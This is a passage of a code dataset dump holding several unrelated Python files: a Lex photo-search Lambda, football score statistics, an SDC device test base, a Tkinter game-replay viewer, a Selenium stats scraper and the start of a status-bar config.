'.format(keywords))\n\n return build_validation_result(True, None, None)\n\n\n""" --- Functions that control the bot's behavior --- """\n \n \n\n\ndef search_intent(intent_request):\n """\n Performs dialog management and fulfillment for photo search.\n Beyond fulfillment, the implementation of this intent demonstrates the use of the elicitSlot dialog action\n in slot validation and re-prompting.\n """\n \n keyword_1 = get_slots(intent_request)["searchkeyone"]\n keyword_2 = get_slots(intent_request)["searchkeytwo"]\n source = intent_request['invocationSource']\n\n if source == 'DialogCodeHook':\n # Perform basic validation on the supplied input slots.\n # Use the elicitSlot dialog action to re-prompt for the first violation detected.\n slots = get_slots(intent_request)\n\n validation_result = validate_searchkey(keyword_1,keyword_2)\n if not validation_result['isValid']:\n slots[validation_result['violatedSlot']] = None\n return elicit_slot(intent_request['sessionAttributes'],\n intent_request['currentIntent']['name'],\n slots,\n validation_result['violatedSlot'],\n validation_result['message'])\n\n # Pass the session attributes back through so they can be used in the prompts defined\n # on the bot model.\n \n output_session_attributes = intent_request['sessionAttributes'] if intent_request['sessionAttributes'] is not None else {}\n\n\n return delegate(output_session_attributes, get_slots(intent_request))\n\n # Run the photo search, and rely on the goodbye message of the bot to define the message to the end user.\n # In a real bot, this would likely involve a call to a backend service.\n \n # sqs = boto3.resource('sqs')\n\n # queue = sqs.get_queue_by_name(QueueName='restaurants_request')\n # msg = {"location":location, "cuisine": cuisine,"numberofpeople":num_people, "phone": phone}\n # response = queue.send_message(MessageBody=json.dumps(msg))\n # print(response)\n \n print(keyword_1)\n print(keyword_2)\n print('start searching')\n \n if keyword_2 is not None:\n query ={\n "query":{\n "bool":{\n "must":[\n {"term": {"labels": keyword_1}},\n {"term": {"labels": keyword_2}}]\n }\n },\n "size": 1000 #number of rows you want to get in the result\n }\n else:\n query ={\n "query":{\n "match": {\n "labels" : keyword_1\n }\n },\n "size": 1000 #number of rows you want to get in the result\n }\n \n r = requests.get(url, auth=awsauth, json=query, headers=headers)\n\n results = json.loads(r.text)\n print(results)\n \n ## to do\n n_hits = int(results['hits']['total']['value'])\n print(n_hits)\n \n photo_object = ''\n \n if(len(results['hits']['hits'])==0):\n print("No matching photo found")\n return close(intent_request['sessionAttributes'],\n 'Fulfilled',\n {'contentType': 'PlainText',\n 'content': 'None'}) \n else:\n for hit in results['hits']['hits']: #loop the data\n photo_object +=(hit['_source']['objectKey'])\n photo_object += ' '\n print("photo Data\\n",hit)\n # use hit['_source'][''] to retrieve the required field data from your lambda\n #print("User Name-->",hit['_source']['id']) \n\n\n #return photo index to frontend\n print(photo_object)\n #return photo_idx\n return close(intent_request['sessionAttributes'],\n 'Fulfilled',\n {'contentType': 'PlainText',\n 'content': photo_object\n })\n\n\n""" --- Intents --- """\n\n\ndef dispatch(intent_request):\n """\n Called when the user specifies an intent for this bot.\n """\n\n logger.debug('dispatch userId={}, intentName={}'.format(intent_request['userId'], 
intent_request['currentIntent']['name']))\n\n intent_name = intent_request['currentIntent']['name']\n\n # Dispatch to your bot's intent handlers\n if intent_name == 'SearchIntent':\n return search_intent(intent_request)\n\n raise Exception('Intent with name ' + intent_name + ' not supported')\n\n\n""" --- Main handler --- """\n\n\ndef lambda_handler(event, context):\n """\n Route the incoming request based on intent.\n The JSON body of the request is provided in the event slot.\n """\n # By default, treat the user request as coming from the America/New_York time zone.\n os.environ['TZ'] = 'America/New_York'\n time.tzset()\n logger.debug('event.bot.name={}'.format(event['bot']['name']))\n \n \n \n print('event is the following:')\n print(event)\n\n return dispatch(event)\n\n\n\n","sub_path":"src/search_photos/search_photos.py","file_name":"search_photos.py","file_ext":"py","file_size_in_byte":8170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"566480697","text":"import csv\nimport itertools\n\n# Load data from file\ndef load_data(from_file, from_year, to_year):\n # Fetch the matches from the last few seasons\n matches = []\n with open(from_file, 'r', newline='') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=',')\n for r in reader:\n season = int(r['Season'])\n if season not in range(from_year, to_year):\n continue\n row = {}\n for f in ['Date', 'HomeTeam', 'AwayTeam', 'Country', 'League']:\n row[f] = r[f].strip()\n skip = False\n for f in ['FTHG', 'FTAG', 'Season']:\n try:\n row[f] = int(r[f])\n except:\n skip = True\n if not skip:\n matches.append(row)\n\n # Find all the teams\n teams = set(r['HomeTeam'] for r in matches) | set(r['AwayTeam'] for r in matches)\n # Full list of matches, each match appearing twice, once per team;\n # determine the number of matches played per team\n match_list = [r['HomeTeam'] for r in matches] + [r['AwayTeam'] for r in matches]\n teams_count = { t: match_list.count(t) for t in teams}\n total_match = len(match_list)\n # Smallest and largest score\n max_score = max(max(r['FTHG'], r['FTAG']) for r in matches)\n min_score = min(min(r['FTHG'], r['FTAG']) for r in matches)\n return matches, total_match, teams, teams_count, min_score, max_score\n\n## Tries to split the teams into groups of best attackers and defenders\ndef split_teams_into_groups(matches, teams, n_cat):\n\n # Build the top group by hand, at level n_cat-1\n best_group = set(["Lyon", "Monaco", "Paris SG"])\n best_group = set()\n adjusted_teams = teams - best_group\n\n\n # Matches played per team\n played = {t : [] for t in adjusted_teams}\n for r in matches:\n if r['HomeTeam'] in adjusted_teams:\n played[r['HomeTeam']].append(r)\n if r['AwayTeam'] in adjusted_teams:\n played[r['AwayTeam']].append(r)\n # Goals scored and conceded per team\n goal_marked = {t:0 for t in adjusted_teams}\n goal_received = {t:0 for t in adjusted_teams}\n for r in matches:\n if r['HomeTeam'] in adjusted_teams:\n goal_marked[r['HomeTeam']] += r['FTHG']\n goal_received[r['HomeTeam']] += r['FTAG']\n if r['AwayTeam'] in adjusted_teams:\n goal_marked[r['AwayTeam']] += r['FTAG']\n goal_received[r['AwayTeam']] += r['FTHG']\n # Average using the number of matches played by a team\n # Average number of goals scored or conceded. 
Teams are ranked in order of increasing strength\n for t in adjusted_teams:\n goal_marked[t] /= len(played[t])\n goal_received[t] /= len(played[t])\n\n goal_marked_ordered = sorted(goal_marked.items(), key=lambda x:x[1], reverse=False)\n goal_received_ordered = sorted(goal_received.items(), key=lambda x:x[1], reverse=True)\n #print(goal_marked_ordered)\n #print(goal_received_ordered)\n\n # Teams are assigned to groups so that the number of matches played per group is roughly equal;\n # otherwise, because the bottom of the table keeps changing, the split comes out badly\n\n # OLD: groups of equal size\n #group_size_old = len(goal_marked_ordered) / n_cat\n #attack_group_old = {t: int(i / group_size_old) for i,(t,_) in enumerate(goal_marked_ordered)}\n #defense_group_old = {t: int(i / group_size_old) for i,(t,_) in enumerate(goal_received_ordered)}\n\n total_match = sum(len(played[t]) for t in adjusted_teams)\n group_size = total_match / (n_cat - (1 if len(best_group) > 0 else 0)) # because I split off the top group by hand\n goal_marked_match = [len(played[t]) for t,_ in goal_marked_ordered]\n goal_marked_match = list(itertools.accumulate(goal_marked_match))\n goal_marked_match = [int(g / group_size) for g in goal_marked_match]\n attack_group = {t: min(g, n_cat - 1 - (1 if len(best_group) > 0 else 0)) for (t, _), g in zip(goal_marked_ordered, goal_marked_match)}\n #print(attack_group)\n\n goal_received_match = [len(played[t]) for t,_ in goal_received_ordered]\n goal_received_match = list(itertools.accumulate(goal_received_match))\n goal_received_match = [ int(g / group_size) for g in goal_received_match]\n defense_group = {t: min(g, n_cat - 1 - (1 if len(best_group) > 0 else 0)) for (t, _), g in zip(goal_received_ordered, goal_received_match)}\n #print(defense_group)\n\n # add the top group\n for t in best_group:\n defense_group[t] = n_cat - 1\n attack_group[t] = n_cat - 1\n return attack_group, defense_group\n\ndef compute_base_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat):\n # Group the scores by attack class\n base_statistics = {} # dictionary indexed by (Aa, Ad, Ba, Bd, s1, s2)\n base_2 = {} # dictionary indexed by (Aa, Ad, Ba, Bd) = { 's': {(s1,s2): goal count}, 'p': {(s1,s2): probability}, 'l': # of samples }\n\n # initialise base_2\n ra = range(n_cat)\n sca = range(min_score, max_score + 1)\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n base_2[(Aa, Ad, Ba, Bd)] = {'s': [[0 for _ in list(sca)] for _ in list(sca)], 'l': 0}\n\n for r in matches:\n Aa = attack_group[r['HomeTeam']]\n Ad = defense_group[r['HomeTeam']]\n Ba = attack_group[r['AwayTeam']]\n Bd = defense_group[r['AwayTeam']]\n s1 = r['FTHG']\n s2 = r['FTAG']\n k = (Aa, Ad, Ba, Bd, s1, s2)\n if k not in base_statistics:\n base_statistics[k] = 0\n base_statistics[k] += 1\n base_2[(Aa, Ad, Ba, Bd)]['l'] += 1\n base_2[(Aa, Ad, Ba, Bd)]['s'][s1][s2] += 1\n\n base_statistics = {k: v / len(matches) for k, v in base_statistics.items()}\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n n = base_2[(Aa, Ad, Ba, Bd)]['l']\n if n > 0:\n base_2[(Aa, Ad, Ba, Bd)]['p'] = [[base_2[(Aa, Ad, Ba, Bd)]['s'][i][j] / n for j in list(sca)] for i in list(sca)]\n\n return base_statistics, base_2\n\ndef write_matrices_to_file(rebuilt_matrices, to_file):\n if to_file != '':\n with open(to_file, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, delimiter=',', fieldnames=['Aa', 'Ad', 'Ba', 'Bd', 'l', 's1', 's2', 'p'])\n writer.writeheader()\n for (Aa, Ad, 
Ba, Bd), r in rebuilt_matrices.items():\n if 'p' not in r:\n continue\n p = r['p']\n l = r['l']\n for s1, row in enumerate(p):\n for s2, probability in enumerate(row):\n w_r = {'Aa': Aa, 'Ad':Ad, 'Ba':Ba, 'Bd':Bd, 'l':l, 's1':s1, 's2':s2, 'p':probability}\n writer.writerow(w_r)\n\ndef write_matrices_flat_to_file(rebuilt_matrices, to_file):\n if to_file != '':\n with open(to_file, 'w', newline='') as csvfile:\n first = False\n fieldnames = ['Aa', 'Ad', 'Ba', 'Bd', 'l']\n for (Aa, Ad, Ba, Bd), r in rebuilt_matrices.items():\n if 'pgd' not in r or 'ptg' not in r:\n continue\n pg = r['pgd']\n tg = r['ptg']\n l = r['l']\n if not first:\n for k in pg:\n fieldnames.append("GD_{}".format(k))\n for k in tg:\n fieldnames.append("TG_{}".format(k))\n writer = csv.DictWriter(csvfile, delimiter=',',fieldnames=fieldnames)\n writer.writeheader()\n first = True\n w_r = {'Aa': Aa, 'Ad': Ad, 'Ba': Ba, 'Bd': Bd, 'l': l}\n for k, probability in pg.items():\n w_r["GD_{}".format(k)] = probability\n for k, probability in tg.items():\n w_r["TG_{}".format(k)] = probability\n writer.writerow(w_r)\n\ndef split_teams_by_seasons_into_groups(matches, teams, n_cat):\n\n # Build the top group by hand, at level n_cat-1\n # Matches played per (team, season)\n played = {}\n for r in matches:\n season = r['Season']\n ht = "{}_{}".format(r['HomeTeam'], season)\n if ht not in played:\n played[ht] = [r]\n else:\n played[ht].append(r)\n at = "{}_{}".format(r['AwayTeam'], season)\n if at not in played:\n played[at] = [r]\n else:\n played[at].append(r)\n\n adjusted_teams = list(played.keys())\n # Goals scored and conceded per team\n goal_marked = {t:0 for t in adjusted_teams}\n goal_received = {t:0 for t in adjusted_teams}\n for r in matches:\n season = r['Season']\n ht = "{}_{}".format(r['HomeTeam'], season)\n at = "{}_{}".format(r['AwayTeam'], season)\n goal_marked[ht] += r['FTHG']\n goal_received[ht] += r['FTAG']\n goal_marked[at] += r['FTAG']\n goal_received[at] += r['FTHG']\n # Average using the number of matches played by a team\n # Average number of goals scored or conceded. 
Teams are ranked in order of increasing strength\n for t in adjusted_teams:\n goal_marked[t] /= len(played[t])\n goal_received[t] /= len(played[t])\n\n goal_marked_ordered = sorted(goal_marked.items(), key=lambda x:x[1], reverse=False)\n goal_received_ordered = sorted(goal_received.items(), key=lambda x:x[1], reverse=True)\n #print(goal_marked_ordered)\n #print(goal_received_ordered)\n\n # groups of equal size\n group_size = len(goal_marked_ordered) / n_cat\n attack_group = {t: int(i / group_size) for i,(t,_) in enumerate(goal_marked_ordered)}\n defense_group = {t: int(i / group_size) for i,(t,_) in enumerate(goal_received_ordered)}\n\n return attack_group, defense_group\n\n# distance between two (Aa, Ad, Ba, Bd) tuples\ndef dist_v(a, b):\n Aa, Ad, Ba, Bd = a\n Aa_, Ad_, Ba_, Bd_ = b\n return abs(Aa - Aa_) + abs(Ad - Ad_) + abs(Ba - Ba_) + abs(Bd - Bd_)\n\n# Build the missing stats\ndef build_matrices_rebuilt(stats, threshold_1, threshold_2, filter_threshold):\n stats_rebuilt = {}\n flat = [(k, r['pgd'],r['ptg'], r['l']) for k, r in stats.items() if r['l'] > 0]\n #data_full = sorted([(k, p, l) for k, p, l in flat if l > 0], key=lambda x: x[2], reverse=True)\n for k, r in list(stats.items()):\n if r['l'] >= threshold_1:\n stats_rebuilt[k] = r\n continue\n # order the nearby vectors by increasing distance\n closest = sorted([(kc, rc['l'], dist_v(k, kc)) for kc, rc in stats.items() if rc['l'] > filter_threshold], key=lambda x:x[2])\n closest_l = list(itertools.takewhile(lambda x: x < threshold_2, itertools.accumulate(l for _, l, _ in closest)))\n closest = closest[:len(closest_l) + 1]\n new_matrix_pg = {k:0 for k,_ in r['gd'].items()}\n new_matrix_tg = {k:0 for k,_ in r['tg'].items()}\n t = 0\n for kc, l, d in closest:\n f = l / (1+d)\n t += f\n new_matrix_pg = {k:x + f * stats[kc]['pgd'][k] for k, x in new_matrix_pg.items()}\n new_matrix_tg = {k:x + f * stats[kc]['ptg'][k] for k, x in new_matrix_tg.items()}\n #t = sum(l for _, l ,_ in closest)\n new_matrix_pg = {k:x / t for k,x in new_matrix_pg.items()}\n new_matrix_tg = {k:x / t for k,x in new_matrix_tg.items()}\n stats_rebuilt[k] = {\n 'pgd': new_matrix_pg,\n 'ptg': new_matrix_tg,\n 'l': sum(l for _, l ,_ in closest)\n }\n return stats_rebuilt\n\n\ndef compute_1N2_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat):\n # Group the scores by attack class\n base_statistics = {} # dictionary indexed by (Aa, Ad, Ba, Bd, s1, s2)\n s_stats = {} # dictionary indexed by (Aa, Ad, Ba, Bd) = { 's': {(s1,s2): goal count}, 'p': {(s1,s2): probability}, 'l': # of samples }\n\n # initialise base_2\n ra = range(n_cat)\n #sca = range(min_score, max_score + 1)\n sca = range(3) # 0-2, 3-5, 6+ (divide by 3)\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n s_stats[(Aa, Ad, Ba, Bd)] = {'s': [[0, 0, 0] for _ in list(sca)], 'l': 0}\n\n for r in matches:\n season = r['Season']\n ht = "{}_{}".format(r['HomeTeam'], season)\n at = "{}_{}".format(r['AwayTeam'], season)\n Aa = attack_group[ht]\n Ad = defense_group[ht]\n Ba = attack_group[at]\n Bd = defense_group[at]\n s1 = r['FTHG']\n s2 = r['FTAG']\n k = (Aa, Ad, Ba, Bd, s1, s2)\n if k not in base_statistics:\n base_statistics[k] = 0\n base_statistics[k] += 1\n gd = 1 if s1 > s2 else (-1 if s1 < s2 else 0)\n tg = min((s1 + s2) // 3, 2)\n s_stats[(Aa, Ad, Ba, Bd)]['l'] += 1\n s_stats[(Aa, Ad, Ba, Bd)]['s'][tg][gd + 1] += 1\n\n base_statistics = {k: v / len(matches) for k, v in base_statistics.items()}\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n 
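# normalise the per-cell counts into outcome probabilities (rows: total-goal bands, columns: loss/draw/win)\n 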
n = s_stats[(Aa, Ad, Ba, Bd)]['l']\n if n > 0:\n s_stats[(Aa, Ad, Ba, Bd)]['p'] = [[s_stats[(Aa, Ad, Ba, Bd)]['s'][i][j] / n for j in range(3)] for i in list(sca)]\n\n return s_stats\n\n\ndef compute_simple_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat):\n # Group the scores by attack class\n results = {} # dictionary indexed by (Aa, Ad, Ba, Bd) = { 'gd': {gd: goal-difference count}, 'pgd': probability, 'l': # of samples }\n\n # initialise base_2\n gd_range = range(-2, 3)\n tg_range = range(4)\n ra = range(n_cat)\n sca = range(min_score, max_score + 1)\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n results[(Aa, Ad, Ba, Bd)] = {\n 'gd': {i:0 for i in list(gd_range)},\n 'l': 0,\n 'tg': {i: 0 for i in list(tg_range)}\n }\n\n for r in matches:\n season = r['Season']\n ht = "{}_{}".format(r['HomeTeam'], season)\n at = "{}_{}".format(r['AwayTeam'], season)\n Aa = attack_group[ht]\n Ad = defense_group[ht]\n Ba = attack_group[at]\n Bd = defense_group[at]\n s1 = r['FTHG']\n s2 = r['FTAG']\n results[(Aa, Ad, Ba, Bd)]['l'] += 1\n gd = s1 - s2\n gd = max(-2, gd)\n gd = min(2, gd) # gd clamped between -2 and 2\n tg = min((s1 + s2) // 2, 3) # Number of goal pairs: 0-1, 2-3, 4-5, 6-7 or more\n results[(Aa, Ad, Ba, Bd)]['gd'][gd] += 1\n results[(Aa, Ad, Ba, Bd)]['tg'][tg] += 1\n\n for Aa, Ad, Ba, Bd in itertools.product(ra, ra, ra, ra):\n n = results[(Aa, Ad, Ba, Bd)]['l']\n if n > 0:\n results[(Aa, Ad, Ba, Bd)]['pgd'] = {i:results[(Aa, Ad, Ba, Bd)]['gd'][i] / n for i in list(gd_range)}\n results[(Aa, Ad, Ba, Bd)]['ptg'] = {i: results[(Aa, Ad, Ba, Bd)]['tg'][i] / n for i in list(tg_range)}\n return results\n\n\n# =================================================================================================\n## Load data from files, identify teams and number of matches per team\ndef load_compute_matrices(from_year, to_year, threshold_1, threshold_2, filter_threshold, n_cat, from_file):\n matches, total_match, teams, teams_count, min_score, max_score = load_data(from_file, from_year, to_year)\n\n ## Split the teams into groups of best attackers and defenders\n attack_group, defense_group = split_teams_by_seasons_into_groups(matches, teams, n_cat)\n\n # First approach: accumulate by Aa, Ad, Ba, Bd, s1, s2\n #_, base_2 = compute_base_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat)\n #s_stats = compute_simple_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat)\n s_stats = compute_1N2_statistics(matches, attack_group, defense_group, min_score, max_score, n_cat)\n\n filtered = {k:v for k, v in s_stats.items() if v['l'] > filter_threshold}\n\n rebuilt = build_matrices_rebuilt(s_stats, threshold_1, threshold_2, filter_threshold)\n\n return s_stats, rebuilt, filtered\n\nif __name__ == "__main__":\n n_cat = 4\n stats, rebuilt, filtered = load_compute_matrices(\n 1900, 2020,\n threshold_1=100,\n threshold_2=200,\n filter_threshold=100,\n n_cat=n_cat,\n from_file='paris_sportifs_filtered.csv'\n )\n write_matrices_flat_to_file(stats, 'matrices_flat_cat{}.csv'.format(n_cat))\n write_matrices_flat_to_file(rebuilt, 'matrices_flat_rebuilt_cat{}.csv'.format(n_cat))\n write_matrices_flat_to_file(filtered, 'matrices_flat_filtered_cat{}.csv'.format(n_cat))\n","sub_path":"build_1N2_from_history.py","file_name":"build_1N2_from_history.py","file_ext":"py","file_size_in_byte":16642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"519648700","text":"import unittest\r\nimport os\r\nfrom sdc11073.wsdiscovery import WSDiscoverySingleAdapter\r\nfrom sdc11073 import pmtypes\r\nfrom sdc11073.location import SdcLocation\r\nfrom sdc11073.sdcclient import SdcClient\r\nfrom tests.mockstuff import SomeDevice\r\n\r\nloopback_adapter = 'Loopback Pseudo-Interface 1' if os.name == 'nt' else 'lo'\r\n\"\"\"\r\nBase test to use in all test that require device or a client. This sets up a default device and client\r\nand has connect method.\r\n\"\"\"\r\n\r\nclass BaseTest(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.wsdiscovery = WSDiscoverySingleAdapter(loopback_adapter)\r\n self.wsdiscovery.start()\r\n self._locValidators = [pmtypes.InstanceIdentifier('Validator', extensionString='System')]\r\n\r\n def tearDown(self):\r\n self.wsdiscovery.stop()\r\n\r\n def setUpCocoDraft10(self):\r\n self.cocoFinalLocation = SdcLocation(fac='tklx', poc='CU1', bed='cocoDraft10Bed')\r\n\r\n self.sdcDeviceCoCoFinal = SomeDevice.fromMdibFile(self.wsdiscovery, None, '70041_MDIB_Final.xml')\r\n self.sdcDeviceCoCoFinal.startAll()\r\n self.sdcDeviceCoCoFinal.setLocation(self.cocoFinalLocation, self._locValidators)\r\n xAddr = self.sdcDeviceCoCoFinal.getXAddrs()\r\n self.sdcClientCocoFinal = SdcClient(xAddr[0],\r\n deviceType=self.sdcDeviceCoCoFinal.mdib.sdc_definitions.MedicalDeviceType,\r\n validate=True)\r\n self.sdcClientCocoFinal.startAll()\r\n\r\n def stopDraft10(self):\r\n self.sdcClientCocoFinal.stopAll()\r\n self.sdcDeviceCoCoFinal.stopAll()\r\n","sub_path":"tests/base_test.py","file_name":"base_test.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"224695693","text":"import sys\nimport os\nimport numpy as np\nimport argparse\nimport glob\nimport time\nsys.path.append('.')\nfrom util.Data import DataLoader\nfrom tkinter import *\n\n\"\"\"\nARG PARSE\n\"\"\"\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--backend', default='pytorch',help='DL backend')\nparser.add_argument('--data_paths', default=[],nargs='*',help='Data paths')\nparser.add_argument('--inference', default=False, help='Real time inference', action='store_true')\nparser.add_argument('--update_interval', default=10, type=int, help='Update interval (ms)')\nargs = parser.parse_args()\n\nbackend = args.backend\ndata_paths = args.data_paths\ninference = args.inference\nupdate_interval = args.update_interval\n\n\"\"\"\nMODEL INIT\n\"\"\"\nsys.path.append('./model')\nif backend == 'tensorflow':\n\n import tensorflow as tf\n from model import Model\n\n sess = tf.Session()\n m = Model()\n m.load(sess)\n\nelif backend == 'pytorch':\n\n from model_pytorch import Model\n\n m = Model()\n m.load()\n\n\ndef drawBoard(board,canvas,b_pix=20):\n canvas.delete('all')\n h, w = board.shape\n for i in range(h):\n for j in range(w):\n _v = board[i][j]\n if _v == 0:\n color = 'black'\n elif _v == 1:\n color = 'white'\n else:\n color = 'gray'\n canvas.create_rectangle(j * b_pix, i * b_pix, (j+1) * b_pix, (i+1) * b_pix, fill=color)\n\ndef drawPolicy(policy,canvas,blocksize=30,offset_x=10,offset_y=100):\n canvas.delete('all')\n for i, v in enumerate(policy):\n color = 'gray' + str(int(100*v))\n canvas.create_rectangle(offset_x+i*blocksize,offset_y,offset_x+(i+1)*blocksize,offset_y+blocksize,fill=color)\n\nindex = 0\n\nif __name__ == '__main__':\n master = Tk()\n master.title('Replay')\n\n list_of_data = []\n for path in data_paths:\n list_of_data += glob.glob(path)\n data = 
DataLoader(list_of_data)\n\n    canvas_frame = Frame(master)\n    canvas_frame.grid(row=0,column=0,rowspan=10,columnspan=5)\n\n    canvas_frame_2 = Frame(master)\n    canvas_frame_2.grid(row=3,column=5,rowspan=7,columnspan=5)\n\n    info_frame = Frame(master)\n    info_frame.grid(row=0,column=5,rowspan=1,columnspan=5)\n\n    control_frame = Frame(master)\n    control_frame.grid(row=1,column=5,rowspan=1,columnspan=5)\n\n    control_frame_2 = Frame(master)\n    control_frame_2.grid(row=2,column=5,rowspan=1,columnspan=5)\n\n    list_of_updates = []\n\n    board_canvas = Canvas(canvas_frame,width=200,height=440)\n    board_canvas.grid(row=1,column=1)\n    def update_board_canvas(index):\n        global data\n        board = data.getBoard(index)\n        drawBoard(board,board_canvas)\n    list_of_updates.append(update_board_canvas)\n\n    policy_canvas_label = Label(canvas_frame_2,text='Policy MCTS')\n    policy_canvas_label.grid(row=0,column=0)\n    policy_canvas = Canvas(canvas_frame_2,width=200,height=50)\n    policy_canvas.grid(row=1,column=0)\n    policy_canvas_label_2 = Label(canvas_frame_2,text='Policy prediction')\n    policy_canvas_label_2.grid(row=2,column=0)\n    policy_canvas_2 = Canvas(canvas_frame_2,width=200,height=50)\n    policy_canvas_2.grid(row=3,column=0)\n    value_label = Label(canvas_frame_2)\n    value_label.grid(row=4,column=0)\n    class_label = Label(canvas_frame_2)\n    class_label.grid(row=5,column=0)\n    def update_policy_canvas(index):\n        global data\n        policy = data.getPolicy(index)\n        if inference:\n            if backend == 'tensorflow':\n                pred = m.inference(sess,[data.getBoard(index)[:,:,None]])\n                value_pred = pred[0][0]\n                policy_pred = pred[1][0]\n                class_pred = np.argmax(pred[2][0])\n            elif backend == 'pytorch':\n                pred = m.inference(data.getBoard(index)[None,None,:,:])\n                value_pred = pred[0][0][0]\n                policy_pred = pred[1][0]\n                class_pred = 0\n        else:\n            value_pred = -1\n            policy_pred = np.zeros((6,)) # zero-filled placeholder so drawPolicy gets valid color values\n            class_pred = 0\n        drawPolicy(policy,policy_canvas,offset_y=0)\n        drawPolicy(policy_pred,policy_canvas_2,offset_y=0)\n        value_label.config(text='Value prediction: %.3f'%value_pred)\n        class_label.config(text='Class prediction: %d'%class_pred)\n    list_of_updates.append(update_policy_canvas)\n\n    current_index_label = Label(info_frame)\n    current_index_label.pack()\n    def update_current_index_label(index):\n        current_index_label.config(text='Current index: %d'%index)\n    list_of_updates.append(update_current_index_label)\n\n    current_cycle_label = Label(info_frame)\n    current_cycle_label.pack()\n    def update_current_cycle_label(index):\n        global data\n        current_cycle_label.config(text='Current cycle: %d'%data.getCycle(index))\n    list_of_updates.append(update_current_cycle_label)\n    \n    current_score_label = Label(info_frame)\n    current_score_label.pack()\n    def update_current_score_label(index):\n        global data\n        current_score_label.config(text='Current score: %d'%data.getScore(index))\n    list_of_updates.append(update_current_score_label)\n\n    def next_index():\n        global index\n        index = data.bound_index(index+1)\n    next_index_button = Button(control_frame,text='Next',command=next_index)\n    next_index_button.grid(row=0,column=0)\n\n    def prev_index():\n        global index\n        index = data.bound_index(index-1) \n    prev_index_button = Button(control_frame,text='Prev',command=prev_index)\n    prev_index_button.grid(row=0,column=1)\n\n    play_after_id = None\n    def play():\n        global index\n        global play_after_id\n        index = data.bound_index(index+1)\n        play_after_id = play_button.after(update_interval,play)\n    play_button = Button(control_frame,text='Play',command=play)\n    play_button.grid(row=0,column=2)\n\n    def stop():\n        global 
play_after_id\n        if play_after_id:\n            master.after_cancel(play_after_id)\n            play_after_id = None\n    stop_button = Button(control_frame,text='Stop',command=stop)\n    stop_button.grid(row=0,column=3)\n\n\n    index_entry_label = Label(control_frame_2,text='Goto index:')\n    index_entry_label.grid(row=0,column=0)\n    def set_index_entry(e):\n        global index\n        index = data.bound_index(int(index_entry.get()))\n        print(index)\n    index_entry = Entry(control_frame_2,width=10)\n    index_entry.bind("<Return>",set_index_entry)\n    index_entry.grid(row=0,column=1)\n    \n    """\n    interval_entry_label = Label(control_frame_2,text='Update interval:')\n    interval_entry_label.grid(row=1,column=0)\n    def set_update_interval(e):\n        global update_interval\n        update_interval = int(interval_entry.get())\n    interval_entry = Entry(control_frame_2,width=10)\n    interval_entry.bind("<Return>",set_update_interval)\n    interval_entry.grid(row=1,column=1)\n    """\n    def global_updater():\n        global index\n        for u in list_of_updates:\n            u(index)\n        master.after(update_interval, global_updater) \n    master.after(update_interval, global_updater) \n    mainloop()\n","sub_path":"tools/replay.py","file_name":"replay.py","file_ext":"py","file_size_in_byte":7069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"297894494","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport time\nimport csv\n\nbrowser=webdriver.Firefox()\ntarget=open('2014Part2.csv', 'r')\ntarget=list(csv.reader(target))\ntime.sleep(4)\nfor line in target:\n\tpos=line[0]\n\tname=line[1]\n\tnameAndPos=name+\"_\"+pos+\"_\"\n\tprint(\"Extracting: \"+name)\n\tbrowser.get(line[2])\n\tdelay=3\n\ttry:\n\t\tWebDriverWait(browser, delay).until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"page_content\"]/div[3]/div[1]/div/span[5]')))\n\t\tcsvElement=browser.find_element_by_xpath('//*[@id=\"page_content\"]/div[3]/div[1]/div/span[5]')\n\t\tfileName=nameAndPos+\"2014log.csv\"\n\t\tprint(\"Scraping for \"+fileName)\n\t\tif csvElement:\n\t\t\tcsvElement.click()\n\t\t\tcsvText=browser.find_element_by_xpath('//*[@id=\"csv_stats\"]').text.encode('utf-8')\n\t\t\ttotalCsvText=name+','+pos+csvText\n\t\t\ttarget=open(fileName, 'w')\n\t\t\ttarget.write(totalCsvText)\n\t\t\ttarget.close()\n\t\t\tprint(\"Done Extraction\")\n\texcept TimeoutException:\n\t\tprint(\"Took too long or couldn't find the element\")","sub_path":"csvDownloader.py","file_name":"csvDownloader.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"191129508","text":"\n# format = '%{l}%[i3workspace]%{c}%[i3windowtitle]%{r}%[battery]%[date]%[time]%[volumestatus]'\nformat_display0 = '%{U#FFD79921}%{l}%[i3workspace]%{c}%[i3windowtitle]%{r}%[cpuload]%[networking]%[battery]%[volumestatus]%[date]%[time]'\nformat_display1 = '%{l}%[i3workspace]%{r}%[date]%[time]'\n#format_display0 = '%{U#FFD79921}%{l}%[bspwmworkspace]%{c}%[bspwmwindowtitle]%{r}%[cpuload]%[networking]%[battery]%[volumestatus]%[date]%[time]'\n#format_display1 = '%{l}%[bspwmworkspace]%{r}%[date]%[time]'\n\n# either i3wm or bspwm\nwm = 'i3wm'\n# sections = ['Battery', 'i3Workspace', 'i3WindowTitle', 'Date',\n#             'Time', 'VolumeStatus', 'Networking', 'CPULoad']\n\nsections = ['Battery', 'Date', 'i3Workspace', 'i3WindowTitle',\n            'Time', 